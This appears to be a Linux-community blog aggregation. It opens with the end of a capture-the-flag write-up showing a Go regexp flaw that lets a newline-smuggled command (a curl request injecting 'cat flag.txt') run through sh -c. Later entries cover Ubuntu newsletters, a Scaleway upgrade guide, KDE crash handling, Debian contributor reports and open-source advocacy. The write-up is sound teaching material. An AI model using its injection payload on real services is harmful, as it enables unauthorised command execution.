We can use a tool like regex101.com to play around with our expression. Specifically, it appears that it should consist of a - followed by one of the characters separated by pipes within the parentheses. At first, this appears pretty limiting, however, if we examine the Go regexp documentation, we might notice a few oddities. Specifically, ^ is defined as “at beginning of text or line (flag m=true)” and $ as “at end of text … or line (flag m=true)”. So apparently two of our special characters have different meanings depending on some “flags”.

There are no flags in our regular expression, so we’re using whatever the defaults are. Looking at the documentation for Flags, we see that there are two default sets of flags: Perl and POSIX. Slightly strangely, the constants use an inverted meaning for the m flag: OneLine, which causes the regular expression engine to “treat ^ and $ as only matching at beginning and end of text”. This flag is not included in POSIX (in fact, no flags are), so in a POSIX RE, ^ and $ match the beginning and end of lines respectively.

Our test for the Regexp to match is MatchString, which is documented as:

MatchString reports whether the string s contains any match of the regular expression re.

Note that the test is “contains any match”. If ^ and $ matched beginning and end of input, that would require the entire string to match, but since they are matching beginning and end of line, so long as the input contains a line matching the regular expression, then MatchString will return true.
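
To see the difference concretely, here is a small standalone Go sketch (not part of the challenge code) comparing the two regexp flavours on a two-line input:

package main

import (
	"fmt"
	"regexp"
)

func main() {
	posixRE := regexp.MustCompilePOSIX("^-(b|d|g|p|s|t|w)$")
	perlRE := regexp.MustCompile("^-(b|d|g|p|s|t|w)$")
	// A valid mode line, followed by an injected command:
	payload := "-d\ncat flag.txt #"
	// POSIX mode: ^ and $ match at line boundaries, so the "-d" line matches.
	fmt.Println(posixRE.MatchString(payload)) // true
	// Default (Perl) mode sets OneLine: ^ and $ only match the text boundaries.
	fmt.Println(perlRE.MatchString(payload)) // false
}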

This now means we can pass arbitrary input via the mode parameter, which will be directly interpolated into the string passed to sh -c. Put another way, we now have a Command Injection vulnerability. We just need to also include a line that matches our regular expression.

To send a parameter containing a newline, we merely need to URL encode (sometimes called percent encoding) the character, resulting in %0A. This can be exploited with a simple cURL command:

curl 'https://cow-say-what-473bf31e.challenges.bsidessf.net/' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-raw 'mode=-d%0acat flag.txt #&message=foo'

The -d%0a matches the regular expression, then we have a command injected (cat flag.txt) and start a comment (#) to just ignore the rest of the command.

 _____
< foo >
 -----
        \   ^__^
         \  (xx)\_______
            (__)\       )\/\
             U  ||----w |
                ||     ||
on June 07, 2022 07:00 AM

June 06, 2022

Welcome to the Ubuntu Weekly Newsletter, Issue 738 for the week of May 29 – June 4, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

on June 06, 2022 10:56 PM

June 04, 2022

You have a Scaleway Virtual Private Server (VPS) and you are considering upgrading your installed Linux distribution. Perhaps you have been notified by Scaleway to upgrade an old Linux version. The email asks you to upgrade but does not give you the necessary information on how to upgrade or how to avoid certain pitfalls.

Scaleway email: “Important Notice: End-Of-Life of Your Instance Images”

What could go wrong when you try to upgrade?

A few things can go wrong.

Watch out for Bootscripts

The most important thing that can go wrong is if your VPS is using a bootscript. A bootscript is a fixed way of booting your Linux server, which included a generic Scaleway-provided Linux kernel. You would be running Ubuntu, but the Linux kernel would be a common Scaleway Linux kernel shared among all Linux distributions. Its config options were set in stone, and that caused some issues. That situation has changed, and Scaleway now uses the distros’ own Linux kernels. But since Scaleway sent an email about old Linux versions, you need to check this one out.

To verify, go into the Advanced Settings, under Boot Mode. If it looks as follows, then you are using a bootscript. When you upgrade the Linux version, the Linux kernel will stay the same, as instructed by the bootscript. The proper Boot Mode should be “Use local boot”, so that your VPS uses your distro’s Linux kernel. Fun fact #39192: if you offer Ubuntu to your users but you do not use the Ubuntu kernel, then Canonical does not grant you a (free) right to advertise that you are offering “Ubuntu”, because it’s not really Ubuntu (the Linux kernel is not a stock Ubuntu Linux kernel). Since around 2019 Scaleway has defaulted to the “Use local boot” Boot Mode. In my case it was indeed “Use local boot”, therefore I did not have to deal with bootscripts. I just clicked on “Use bootscript” for the purposes of this post; I did not apply the change.

Boot Mode in the Scaleway Advanced Settings.

Verify that the console works (Serial console, recovery)

You normally connect to your Linux server using SSH. But what happens if something goes wrong and you lose access, specifically while you are upgrading your Linux installation? You need a separate way, a backup option, to connect back to the server. This is achieved with the Console. It opens up a browser window that gives you access to the Linux console of the server, over the web. It is separate from SSH, therefore if SSH access is not available but the server is still running, you can still get access here. Note that when you upgrade Debian or Ubuntu over SSH with do-release-upgrade, the upgrader creates a screen session that you can detach and attach at will. If you lose SSH access, connect to the Console and attach there.
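
If that happens, reattaching is straightforward (a sketch; do-release-upgrade runs its screen session as root):

# List the upgrader's screen session, then reattach to it:
sudo screen -ls
sudo screen -r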

Link to open the Console.

Note two things.

  1. The Console in Scaleway does not work on Firefox; anything based on Chromium should work fine. It is not clear why it does not work. If you place your mouse cursor on the button, it shows Firefox is not currently compatible with the serial console.
  2. Make sure that you know the username and password of your non-root account on your Scaleway server. No, really. You would normally connect with SSH and public-key authentication, but for what it’s worth, the account could be locked. Try it out now and get a shell.

Beware of firewalls and security policies and security groups

When you upgrade the distribution on Debian and Ubuntu over SSH, the installer/upgrader will tell you that it will open a backup SSH server on a different port, like 1022. It will also tell you to open that port if you use a Linux firewall on your server. If you plan to keep that as a backup option, note that Scaleway has a facility called Security Groups that works like a global firewall for your Scaleway servers. That is, you can block access to certain ports if you specify them in a Security Group and assign your Scaleway servers to that Security Group.

Therefore, if you plan to rely on access to port 1022, make sure that the Security Group does not block it.
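
If you also run a host firewall such as ufw, the fallback port has to be open there too (a sketch; adjust to your firewall of choice):

sudo ufw allow 1022/tcp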

How to avoid having things go wrong?

When you upgrade a Linux distribution, you are asked all sorts of questions along the way. Most likely, the upgrader will ask whether you want to keep a certain configuration file or have it replaced by the newer version.

If you are upgrading your Ubuntu server, you would install the ubuntu-release-upgrader-core package and then run do-release-upgrade.

$ sudo apt install ubuntu-release-upgrader-core
$ sudo do-release-upgrade

To avoid making a mistake here, you can launch a new Scaleway server with that old Linux distro version and perform a test upgrade there. By doing so, you will note that you will be asked:

  1. whether to keep your old SSH configuration or install a new one. Install the new one and make a note to apply later any changes from the old configuration.
  2. whether to be asked specifically which services to restart or let the system do these automatically. You would consider this if the server deals with a lot of traffic.
  3. whether to keep or install the new configuration for the Web server. Most likely you keep the old configuration. Otherwise your Web server may not start automatically and you will need to fix the configuration files manually.
  4. whether you want to keep or update grub. AFAIK, grub is not used here, so the answer does not matter.
  5. whether you want to upgrade to the snap package of LXD. If you use LXD, you should have switched already to the snap package of LXD so that you are not asked here. If you do not use LXD, then before the upgrade you should uninstall LXD (the DEB version) so that the upgrade does not install the snap package of LXD. If the installer decides that you must upgrade LXD, you cannot select to skip it; you will get the snap package of LXD.

Here are some relevant screenshots.

You are upgrading over SSH so you are getting an extra SSH server for your safety.
How it looks when you upgrade from a pristine Ubuntu 16.04 to Ubuntu 18.04.
Fast-forward: the upgrade completed and we connect with SSH. We are prompted to upgrade again to the next LTS, Ubuntu 20.04.
How it looks when you upgrade from a pristine Ubuntu 18.04 to Ubuntu 20.04.


You have upgraded your server but your WordPress site does not start. Why? Here’s a screenshot.

Error “502 Bad Gateway” from a WordPress website.

A WordPress website requires PHP, and the PHP package does indeed update automatically. The problem is with the Unix socket for PHP. The Web server (NGINX in our case) needs access to the Unix socket of PHP, and in Ubuntu that socket looks like /run/php/php7.4-fpm.sock, with the version number changing between releases.

Ubuntu version   Filename of the PHP Unix socket
Ubuntu 16.04     /run/php/php7.0-fpm.sock
Ubuntu 18.04     /run/php/php7.2-fpm.sock
Ubuntu 20.04     /run/php/php7.4-fpm.sock

The filename of the PHP Unix socket per Ubuntu version.

Therefore, you need to open the configuration file for each of your websites and update the fastcgi_pass line with the new filename of the PHP Unix socket. Here is the corrected snippet for Ubuntu 20.04.

# pass the PHP scripts to the FastCGI server listening on the PHP-FPM socket
location ~ \.php$ {
     include snippets/fastcgi-php.conf;
     # With php7.0-cgi alone (TCP socket):
     # fastcgi_pass 127.0.0.1:9000;
     # With php7.0-fpm:
     fastcgi_pass unix:/run/php/php7.4-fpm.sock;
}
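
After editing each site’s configuration, validate and reload NGINX (assuming a systemd-based setup):

# Check that the edited configuration parses cleanly, then apply it:
sudo nginx -t
sudo systemctl reload nginx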

A request

Scaleway, if you are reading this, please have a look at this feature request.

on June 04, 2022 03:51 PM

June 02, 2022

Lubuntu 21.10 (Impish Indri) was released October 14, 2021 and will reach End of Life on Thursday, July 14, 2022. This means that after that date there will be no further security updates or bugfixes released. After July 14th, the only supported releases of Lubuntu will be 20.04 and 22.04. All other releases of Lubuntu will […]
on June 02, 2022 11:14 PM

May 31, 2022

Full Circle Weekly News #264

Full Circle Magazine

SIMH simulator license dispute:

Vulnerability in the Linux perf kernel subsystem:

HP has announced a laptop that comes with Pop!_OS:

Ubuntu 22.10 will move to audio processing with PipeWire instead of PulseAudio:

Lotus 1-2-3 ported to Linux:

KDE Plasma 5.25 desktop testing:

DeepMind Opens Code for MuJoCo Physics Simulator:

Alpine Linux 3.16:

nginx 1.22.0 released:

Clonezilla Live 3.0.0 released:

Mir 2.8 display server released:

Roadmap for Budgie's user environment:

Release of the anonymous network I2P 1.8.0 and the C++ client i2pd 2.42:

AlmaLinux 9.0 distribution available:

Ubuntu developers begin to solve problems with the slow Firefox snap:

A hardwired password revealed in Linuxfx:

Full Circle Magazine
Host: bardmoss@pm.me, @bardictriad
Bumper: Canonical
Theme Music: From The Dust - Stardust
on May 31, 2022 07:05 PM

May 27, 2022

Full Circle Magazine #181

Full Circle Magazine

This month:
* Command & Conquer
* How-To : Python, Blender and Latex
* Graphics : Inkscape
* Everyday Ubuntu : KDE Science Pt.2
* Micro This Micro That
* Review : Ubuntu 22.04
* Review : Puppy Linux Slacko 7
* My Story : My Journey To Ubuntu 22.04
* Ubports Touch
* Ubuntu Games : The Darkside Detective
plus: News, The Daily Waddle, Q&A, and more.

Get it while it’s hot: https://fullcirclemagazine.org/issue-181/

on May 27, 2022 04:28 PM

May 26, 2022

The Lubuntu Team is pleased to announce we are running a Kinetic Kudu artwork competition, giving you, our community, the chance to submit, and get your favorite wallpapers for both the desktop and the greeter/login screen (SDDM) included in the Lubuntu 22.10 release. Show Your Artwork To enter, simply post your image into this thread […]
on May 26, 2022 10:57 AM

May 25, 2022

DrKonqi ❤️ coredumpd

Harald Sitter

Get some popcorn and strap in for a long one! I shall delight you with some insights into crash handling and all that unicorn sparkle material.

Since Plasma 5.24 DrKonqi, Plasma’s infamous crash reporter, has gained support to route crashes through coredumpd and it is amazing – albeit a bit unused. That is why I’m telling you about it now because it’s matured a bit and is even more amazing – albeit still unused, I hope that will change.

To explain what any of this does I have to explain some basics first, so we are on the same page…

Most applications made by KDE will generally rely on KCrash, a KDE framework that implements crash handling, to, well, handle crashes. The way this works depends a bit on the operating system, but one way or another, when an application encounters a fault it first stops to think for a moment, about the meaning of life and whatever else; we call that “catching the crash”. During that time frame we can apply further diagnostics to help figure out later what went wrong. On POSIX systems specifically, we generate a backtrace and send that off to our bugzilla for handling by a developer – that is, in essence, the job of DrKonqi.

Currently DrKonqi operates in a mode of operation generally dubbed “just-in-time debugging”. When a crash occurs: KCrash immediately starts DrKonqi, DrKonqi attaches GDB to the still running process, GDB creates a backtrace, and then DrKonqi sends the trace along with metadata to bugzilla.

Just-in-time debugging is often useful on developer machines because you can easily switch to interactive debugging and also have a more complete picture of the environmental system state. For user systems it is a bit awkward though. You may not have time to deal with the report right now, you may have no internet connection, indeed the crash may be impossible to trace because of technical complications occurring during just-in-time debugging because of how POSIX signals work (threads continue running :O), etc.

In short: just-in-time really shouldn’t be the default.

Enter coredumpd.

Coredumpd is part of systemd and acts as the kernel’s core handler. Ah, that’s a mouthful again. Let’s backtrace (pun intended)… earlier, when I was talking about KCrash, I only told part of the story. When a fault occurs it doesn’t necessarily mean that the application has to crash; it could also exit neatly. It is only when the application takes no further action to alleviate the problem that the Linux kernel will jump in and do some rudimentary crash handling, forcefully. Very rudimentary indeed: it simply takes the memory state of the process and dumps it into a file. This is then aptly called a core dump. It’s kind of like a snapshot of the state of the process when the fault occurred and allows for debugging after the fact. Now things get interesting, don’t they? 🙂

So… KCrash can simply do nothing and let the Linux kernel do the work, and the Linux kernel can also be lazy and delegate the work to a so-called core handler, an application that handles the core dumping. Well, here we are. That core handler can be coredumpd, making it the effective crash handler.

What’s the point you ask? — We get to be lazy!

Also, core dumping has one huge advantage that also is its disadvantage (depending on how you look at it): when a core dumps, the process is no longer running. When backtracing a core dump you are looking at a snapshot of the past, not a still running process. That means you can deal with crashes now or in 5 minutes or in 10 hours. So long as the core dump is available on disk you can trace the cause of the crash. This is further improved by coredumpd also storing a whole lot of metadata in journald. All put together it allows us to run drkonqi after-the-fact, instead of just-in-time. Amazing! I’m sure you will agree.
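Since the dumps and their journald metadata stick around, you can inspect them at any time with systemd’s own tooling. A couple of standard coredumpctl invocations, purely by way of illustration:

coredumpctl list     # every core dump coredumpd knows about
coredumpctl info     # metadata for the most recent dump
coredumpctl debug    # open the most recent dump in a debugger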

For the user everything looks the same, but under the hood we’ve gotten rid of various race conditions and gotten crash persistence across reboots for free!

Among other things this gives us the ability to look at past crashes. A GUI for which will be included in Plasma 5.25. Future plans also include the ability to file bug reports long after the fact.

Inner Workings

The way this works behind the scenes is somewhat complicated but should be easy enough to follow:

  • The application produces a fault
  • KCrash writes KCrash-specific metadata into a file on disk and doesn’t exit
  • The kernel issues a core dump via coredumpd
  • The systemd unit coredump@ starts
  • At the same time drkonqi-coredump-processor@ starts
  • The processor@ waits for coredump@ to finish its task of dumping the core
  • The processor@ starts drkonqi-coredump-launcher@ in user scope
  • launcher@ starts DrKonqi with the same arguments as though it had been started just-in-time
  • DrKonqi assembles all the data to produce a crash report
  • the user is greeted by a crash notification just like just-in-time debugging
  • the entire crash reporting procedure is the same

Use It!

If you are using KDE neon unstable edition you have already been using coredumpd-based crash reporting for months! You haven’t even noticed, have you? 😉

If not, here’s your chance to join the after-the-fact club of cool kids.


Simply set `KCRASH_DUMP_ONLY=1` in your `/etc/environment` and make sure your distribution has enabled the relevant systemd units accordingly.
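Whether your distribution actually ships and enables those units can be checked with systemd itself, for example:

systemctl list-unit-files 'drkonqi-coredump-*'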

on May 25, 2022 07:59 PM

May 24, 2022

Mixtape: Jardin De Amor

Daniel Holbach


Check in here for an hour-long trip around the globe and experience a few of my new favorites. Sometimes a little trippy and dreamy, but all very danceable…

  1. JÇÃO & Caracas Dub - Suena la decadente
  2. Los Destellos - Jardin De Amor (David Pacheco & Tribilin Sound Remix)
  3. VON Krup Feat. Alekzal - Fosfenos (jiony Remix)
  4. Ka Moma - Lamba Da Di (Harro Triptrap Edit)
  5. Eartha Kitt - Angelitos Negros (Billy Caso’s Sliced Sky Remix)
  6. hubbabubbaklubb - Mopedbart (Barda Edit)
  7. Crussen - Bufarsveienen
  8. Josephine Baker - La Conga Blicoti (Polo & Pan Remix)
  9. Gene Farris & Kid Enigma - David Copperfield
  10. Viidra - Mitally
  11. Quantic - You Used to Love Me feat. Denitia (Selva Remix)
  12. Dombrance - Taubira (Prins Thomas Diskomiks)
on May 24, 2022 01:00 PM

May 22, 2022

Small EInk Phone

Bryan Quigley

Aside, 2022-05-22: it's not the same, but there is a renewed push by Pebble creator Eric Migicovsky to show demand for a SmallAndroidPhone. It's currently at about 29,000.

Update 2022-02-26: Only got 12 responses which likely means there isn't that much demand for this product at this time (or it wasn't interesting enough to spread). Here are the results as promised:

What's the most you would be willing to spend on this? 7 – $200, 4 – $400. But that doesn't quite capture it: some wanted even cheaper than $200 (which isn't doable) and others were willing to spend a lot more.

Of the priorities that got at least 2 people agreeing (ignoring rating): 4 – Openness of components, Software Investments; 3 – Better Modem, Headphone Jack, Cheaper Price; 2 – Convergence Capable, Color eInk, Replaceable Battery.

I'd guess about half of the respondents would likely be happy with a PinePhone (Pro) that got better battery life and "Just Works".

End Update.

Would you be interested in crowdfunding a small E Ink Open Phone? If yes, check out the specs and fill out the form below.

If I get 1000 interested people, I'll approach manufacturers. I plan to share the results publicly in either case. I will never share your information with manufacturers but contact you by email if this goes forward.


  • Small sized for 2021 (somewhere between 4.5 - 5.2 inches)
  • E Ink screen (Maybe Color) - battery life over playing videos/games
  • To be shipped with one of the main Linux phone OSes (Manjaro with KDE Plasma, etc).
  • Low to moderate hardware specs
  • Likely >6 months from purchase to getting device

Minimum goal specs (we might be able to do much better than these, but again might not):

  • 4 Core
  • 32 GB Storage
  • USB Type-C (Not necessarily display out capable)
  • ~8 MP Front camera
  • GPS
  • GSM Modem (US)

Software Goals:

  • Only open source apps pre-installed
  • Phone calls
  • View websites / webapps including at least 1 rideshare/taxi service working (may not be official)
  • 2 day battery life (during "normal" usage)

Discussions: Phoronix

on May 22, 2022 04:30 AM

May 20, 2022

Are you using Kubuntu 22.04 Jammy Jellyfish, our current Stable release? Or are you already running our development builds of the upcoming 22.10 Kinetic Kudu?

We currently have Plasma 5.24.90 (Plasma 5.25 Beta)  available in our Beta PPA for Kubuntu 22.04, and in the Ubuntu archive and daily ISO build for the 22.10 development series.

However, this is a beta release, and we should reiterate the disclaimer from the upstream release announcement:

DISCLAIMER: Today we are bringing you the preview version of KDE’s Plasma 5.25 desktop release. Plasma 5.25 Beta is aimed at testers, developers, and bug-hunters. To help KDE developers iron out bugs and solve issues, install Plasma 5.25 Beta and test run the features listed below. Please report bugs to our bug tracker. We will be holding a Plasma 5.25 beta review day on May 26 (details will be published on our social media) and you can join us for a day of bug-hunting, triaging and solving alongside the Plasma devs! The final version of Plasma 5.25 will become available for the general public on the 14th of June. DISCLAIMER: This release contains untested and unstable software. It is highly recommended you do not use this version in a production environment and do not use it as your daily work environment. You risk crashes and loss of data.


Testers of the Kubuntu 22.10 Kinetic Kudu development series:

Testers with a current install can simply upgrade their packages to install the 5.25 Beta.

Alternatively, a live/install image is available at: http://cdimage.ubuntu.com/kubuntu/daily-live/current/

Users on Kubuntu 22.04 Jammy Jellyfish:

5.25 Beta packages and required dependencies are available in our Beta PPA.

The PPA should work whether you are currently using our backports PPA or not.

If you are prepared to test via the PPA, then…

Add the beta PPA and then upgrade:

sudo add-apt-repository ppa:kubuntu-ppa/beta && sudo apt full-upgrade -y

Then reboot.

In case of issues, testers should be prepared to use ppa-purge to remove the PPA and revert/downgrade packages.
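For example, a revert would look something like this (assuming the beta PPA added above):

sudo apt install ppa-purge
sudo ppa-purge ppa:kubuntu-ppa/beta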

Kubuntu is part of the KDE community, so this testing will benefit both Kubuntu and upstream KDE Plasma software, which is used by many other distributions too.

  • If you believe you might have found a packaging bug, you can use launchpad.net to post testing feedback to the Kubuntu team as a bug, or give feedback on IRC [1], or mailing lists [2].
  • If you believe you have found a bug in the underlying software, then bugs.kde.org is the best place to file your bug report.

Please review the release announcement and changelog.

[Test Case]
* General tests:
– Does plasma desktop start as normal with no apparent regressions over 5.24?
– General workflow – testers should carry out their normal tasks, using the plasma features they normally do, and test common subsystems such as audio, settings changes, compositing, desktop effects, suspend, etc.
* Specific tests:
– Check the changelog:
– Identify items with front/user facing changes capable of specific testing.
– Test the ‘fixed’ functionality or ‘new’ feature.

Testing may involve some technical set up, so while you do not need to be a highly advanced K/Ubuntu user, some proficiency in apt-based package management is advisable.

Testing is very important to the quality of the software Ubuntu and Kubuntu developers package and release.

We need your help to get this important beta release in shape for Kubuntu and the KDE community as a whole.


Please stop by the Kubuntu-devel IRC channel on libera.chat if you need clarification of any of the steps to follow.

[1] – #kubuntu-devel on libera.chat
[2] – https://lists.ubuntu.com/mailman/listinfo/kubuntu-devel

on May 20, 2022 05:06 PM

May 10, 2022

Here’s my (thirty-second) monthly but brief update about the activities I’ve done in the F/L/OSS world.


This was my 41st month of actively contributing to Debian. I became a DM in late March 2019 and a DD on Christmas ‘19! \o/

There’s a bunch of things I did this month but mostly non-technical, now that DC22 is around the corner. Here are the things I did:

Debian Uploads

Other $things:

  • Volunteering for DC22 Content team.
  • Leading the Bursary team w/ Paulo.
  • Answering a bunch of questions and things around bursary.
  • Being an AM for Arun Kumar, process #1024.
  • Mentoring for newcomers.
  • Moderation of -project mailing list.


This was my 16th month of actively contributing to Ubuntu. Now that I joined Canonical to work on Ubuntu full-time, there’s a bunch of things I do! \o/

I mostly worked on different things, I guess.

I was too lazy to maintain a list of things I worked on so there’s no concrete list atm. Maybe I’ll get back to this section later or will start to list stuff from the fall, as I was doing before. :D

Debian (E)LTS

Debian Long Term Support (LTS) is a project to extend the lifetime of all Debian stable releases to (at least) 5 years. Debian LTS is not handled by the Debian security team, but by a separate group of volunteers and companies interested in making it a success.

And Debian Extended LTS (ELTS) is its sister project, extending support to the Jessie release (+2 years after LTS support).

This was my thirty-second month as a Debian LTS and twenty-third month as a Debian ELTS paid contributor.
I worked for 35.00 hours for LTS and 30.00 hours for ELTS.

LTS CVE Fixes and Announcements:

ELTS CVE Fixes and Announcements:

Other (E)LTS Work:

  • Triaged cifs-utils, vim, elog, needrestart, amd64-microcode, libgoogle-gson-java, lrzip, and mutt.
  • Started as a Freexian Collaborator! \o/
  • Read through the documentation bits around that.
  • Helped and assisted new contributors joining Freexian.
  • Answered questions (& discussions) on IRC (#debian-lts and #debian-elts).
  • Participated and helped fellow members with their queries via private mail and chat.
  • General and other discussions on LTS private and public mailing list.

Debian LTS Survey

I’ve spent 2 hours on the LTS survey on the following bits:

  • Finalizing and wrapping up the survey.
  • Providing the stats, working on the initial export of the survey.
  • Dropping ghost entries and other things which are useless. :)

Until next time.
:wq for today.

on May 10, 2022 05:41 AM

Here’s my (thirty-first) monthly but brief update about the activities I’ve done in the F/L/OSS world.


This was my 40th month of actively contributing to Debian. I became a DM in late March 2019 and a DD on Christmas ‘19! \o/

There’s a bunch of things I did this month but mostly non-technical, now that DC22 is around the corner. Here are the things I did:

Debian Uploads

  • Helped Andrius w/ FTBFS for php-text-captcha, reported via #977403.
    • I fixed the same in Ubuntu a couple of months ago and they copied over the patch here.

Other $things:

  • Volunteering for DC22 Content team.
  • Leading the Bursary team w/ Paulo.
  • Answering a bunch of questions of referees and attendees around bursary.
  • Being an AM for Arun Kumar, process #1024.
  • Mentoring for newcomers.
  • Moderation of -project mailing list.


This was my 15th month of actively contributing to Ubuntu. Now that I joined Canonical to work on Ubuntu full-time, there’s a bunch of things I do! \o/

I mostly worked on different things, I guess.

I was too lazy to maintain a list of things I worked on so there’s no concrete list atm. Maybe I’ll get back to this section later or will start to list stuff from the fall, as I was doing before. :D

Debian (E)LTS

Debian Long Term Support (LTS) is a project to extend the lifetime of all Debian stable releases to (at least) 5 years. Debian LTS is not handled by the Debian security team, but by a separate group of volunteers and companies interested in making it a success.

And Debian Extended LTS (ELTS) is its sister project, extending support to the Jessie release (+2 years after LTS support).

This was my thirty-first month as a Debian LTS and twentieth month as a Debian ELTS paid contributor.
I worked for 23.25 hours for LTS and 20.00 hours for ELTS.

LTS CVE Fixes and Announcements:

  • Issued DLA 2976-1, fixing CVE-2022-1271, for gzip.
    For Debian 9 stretch, these problems have been fixed in version 1.6-5+deb9u1.
  • Issued DLA 2977-1, fixing CVE-2022-1271, for xz-utils.
    For Debian 9 stretch, these problems have been fixed in version 5.2.2-1.2+deb9u1.
  • Working on src:tiff and src:mbedtls to fix the issues, still waiting for more issues to be reported, though.
  • Looking at src:mutt CVEs. Haven’t had the time to complete but shall roll out next month.

ELTS CVE Fixes and Announcements:

  • Issued ELA 593-1, fixing CVE-2022-1271, for gzip.
    For Debian 8 jessie, these problems have been fixed in version 1.6-4+deb8u1.
  • Issued ELA 594-1, fixing CVE-2022-1271, for xz-utils.
    For Debian 8 jessie, these problems have been fixed in version 5.1.1alpha+20120614-2+deb8u1.
  • Issued ELA 598-1, fixing CVE-2019-16935, CVE-2021-3177, and CVE-2021-4189, for python2.7.
    For Debian 8 jessie, these problems have been fixed in version 2.7.9-2-ds1-1+deb8u9.
  • Working on src:tiff and src:beep to fix the issues, still waiting for more issues to be reported for src:tiff and src:beep is a bit of a PITA, though. :)

Other (E)LTS Work:

  • Triaged gzip, xz-utils, tiff, beep, python2.7, python-django, and libgit2.
  • Signed up to be a Freexian Collaborator! \o/
  • Read through some bits around that.
  • Helped and assisted new contributors joining Freexian.
  • Answered questions (& discussions) on IRC (#debian-lts and #debian-elts).
  • General and other discussions on LTS private and public mailing list.
  • Attended monthly Debian meeting. Held on Jitsi this month.

Debian LTS Survey

I’ve spent 18 hours on the LTS survey on the following bits:

  • Rolled out the announcement. Started the survey.
  • Answered a bunch of queries, people asked via e-mail.
  • Looked at another bunch of tickets: https://salsa.debian.org/freexian-team/project-funding/-/issues/23.
  • Sent a reminder and fixed a few things here and there.
  • Gave a status update during the meeting.
  • Extended the duration of the survey.

Until next time.
:wq for today.

on May 10, 2022 05:41 AM

May 04, 2022

Contributing to any open-source project is a great way to spend a few hours each month. I started more than 10 years ago, and it has ultimately shaped my career in ways I couldn’t have imagined!

GitLab logo as cover

The new GitLab logo, just announced on the 27th April 2022.

Nowadays, my contributions focus mostly on GitLab, so you will see many references to it in this blog post, but the content is quite generalizable; I would like to share my experience to highlight why you should consider contributing to an open-source project.

Writing blog posts, tweeting, and helping foster the community are nice ways to contribute to a project ;-)

And contributing doesn't mean only coding – there are countless ways to help an open-source project: translating it into different languages, reporting issues, designing new features, writing the documentation, offering support on forums and StackOverflow, and so on.

Before diving deep into this wall of text, be aware that this blog post has three main parts after this introduction: a context section, where I describe my personal experience with open source and what it means to me; then a nice list of reasons to contribute to any project; and, in closing, some tips on how to start contributing, both in general and specific to GitLab.


Ten years ago, I was fresh out of high school, without (almost) any knowledge about IT: however, I found out that I had a massive passion for it, so I enrolled in a Computer Engineering university (boring!), and I started contributing to Ubuntu (cool!). I began with the Italian Local Community, and I soon moved to Ubuntu Touch.

I often considered rewriting that old article; however, I have a strange attachment to it as it is, with all those English mistakes. It was one of the first blog posts I ever wrote, and it was really well received! We all know how it ended, but it still has been a fantastic ride, with a lot of great moments: just take a look at the archive of this blog, and you can see the passion and the enthusiasm I had. I was so enthusiastic that I wrote a blog post similar to this one! I think it highlights really well the considerable difference 10 years make.

Back then, I wasn't working, just studying, so I had a lot of spare time. My English was way worse. I was at the beginning of my journey in the computer world, and Ubuntu has ultimately shaped a big part of it. My knowledge was very limited, and I had never worked before. Contributing to Ubuntu gave me a glimpse of the real world; I met outstanding engineers who taught me a lot, and it boosted my CV, helping me to land my first job.

Advocacy, as in this blog post, is a great way to contribute! You spread awareness, and this helps to find new contributors, and maybe inspires some young student to try it out! Since then, I completed a master's degree in C.S., worked in different companies in three different countries, and became a professional. Nowadays, my contributions to open source are more sporadic (adulthood, yay), but given how much it meant to me, I am still a big fan, and I try to contribute when I can, and how I can.

Why contributing


During my years contributing to open-source software, I've met countless incredible people, some of whom I've become friends with. In the old blog post I mentioned David: in the last 9 years we stayed in touch and met on different occasions in different cities; the last time was as recent as last summer. Back at the time, he was a Manager in the Ubuntu Community Team at Canonical, and then he became Director of Community Relations at GitLab. Small world!

The Ubuntu Touch Community Team in Malta, in 2014

The Ubuntu Touch Community Team in Malta, in 2014. It has been an incredible week, sponsored by Canonical!

One interesting thing is that people contribute to open-source projects from their homes, all around the world: when I travel, I usually know somebody living in my destination city, so I always have at least one night booked for a beer with somebody I've met only online. It's a pleasure to speak with people from different backgrounds and get a glimpse into their lives, all united by one common passion.


Having fun is important! You cannot spend your leisure time getting bored or annoyed: contributing to open source is fun 'cause you pick the problems you would like to work on, and you don't need all the bureaucracy and meetings that are often part of your daily job. You can be challenged, feel useful, and improve a product, without any manager on your shoulders, and at your own pace.

Being up-to-date on how things evolve

For example, the GitLab Handbook is a precious collection of resources, ideas, and methodologies on how to run a 1000 people company in a transparent, full remote, way. It’s a great reading, with a lot of wisdom.

Contributing to a project typically gives you an idea of how the teams behind it work, which technologies they use, and which methodologies. Many open-source projects use bleeding-edge technologies, or chart the path forward. Being in contact with new ideas is a great way to know where the industry is headed and what the latest news is: this is especially true if you hang out in the channels where the community meets, be they Discord, forums, or IRC (well, IRC is not really bleeding-edge, but it is fun).


When contributing in an area that doesn't match your expertise, you always learn something new: reviews are usually precise and on point, and projects of a remarkable size commonly have a coaching team that helps you start contributing and guides you on how to land your first patches.

In GitLab, if you need help merging your code, there are the Merge Request Coaches! And for any type of help, you can always join Gitter, ask on the forum, or write to the dedicated email address.

Feel also free to ping me directly if you want some general guidance!

Giving back

I work as a Platform Engineer. My job is built on an incredible amount of open-source libraries and amazing FOSS services, and I basically just have to glue different pieces together. When I find some rough edge that could be improved, I try to do so.

Nowadays, I find having well-maintained documentation crucial, so after I have achieved something complex, I usually go back and try to improve the documentation where it is lacking. It is my tiny way to say thanks and give back to a world that has really shaped my career.

This is also what most of my blog posts are about: after completing something that took real effort, I find it nice to be able to share that information. Every so often, I find myself following my own guide years later, and I really appreciate it when other people find the content useful.


Who doesn't like swag? :-) Numerous projects have delightful swag, starting from stickers, that they like to share with the whole community. Of course, it shouldn't be your main driver, 'cause you will soon notice that it is ultimately not worth the amount of time you spend contributing, but it is charming to have GitLab socks!

A GitLab branded mechanical keyboard

A GitLab branded mechanical keyboard, courtesy of the GitLab's security team! This very article has been typed with it!


I hope I inspired you to contribute to some open-source project (maybe GitLab!). Now, let’s talk about some small tricks on how to begin easily.

Find something you are passionate about

You must find a project you are passionate about, and that you use frequently. Looking forward to a release, knowing that your contributions will be included, is wonderfully satisfying and can really push you to do more.

Moreover, if you already know the project you want to contribute to, you probably already know the biggest pain points and where the project needs some contributions.

Start small and easy

You don’t need to do gigantic contributions to begin. Find something tiny, so you can get familiar with the project workflows, and how contributions are received.

